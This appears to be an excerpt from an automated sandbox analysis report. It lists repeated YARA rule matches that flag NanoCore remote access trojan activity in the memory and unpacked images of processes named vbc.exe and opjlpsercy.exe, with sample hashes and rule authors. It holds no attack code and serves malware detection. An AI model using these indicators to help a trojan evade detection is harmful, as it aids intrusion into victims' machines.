Source: 00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.49d0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.49d0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.3339f42.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3339f42.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.55e0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55e0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.5460000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5460000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.5610000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5610000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5450000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5450000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.33d6174.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.33d6174.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.55e0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55e0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.21968f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.21968f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.21968f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.221641c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.221641c.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.55b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.55b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.5610000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5610000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.21a7c2c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.21a7c2c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.57e0000.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57e0000.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.221641c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.221641c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
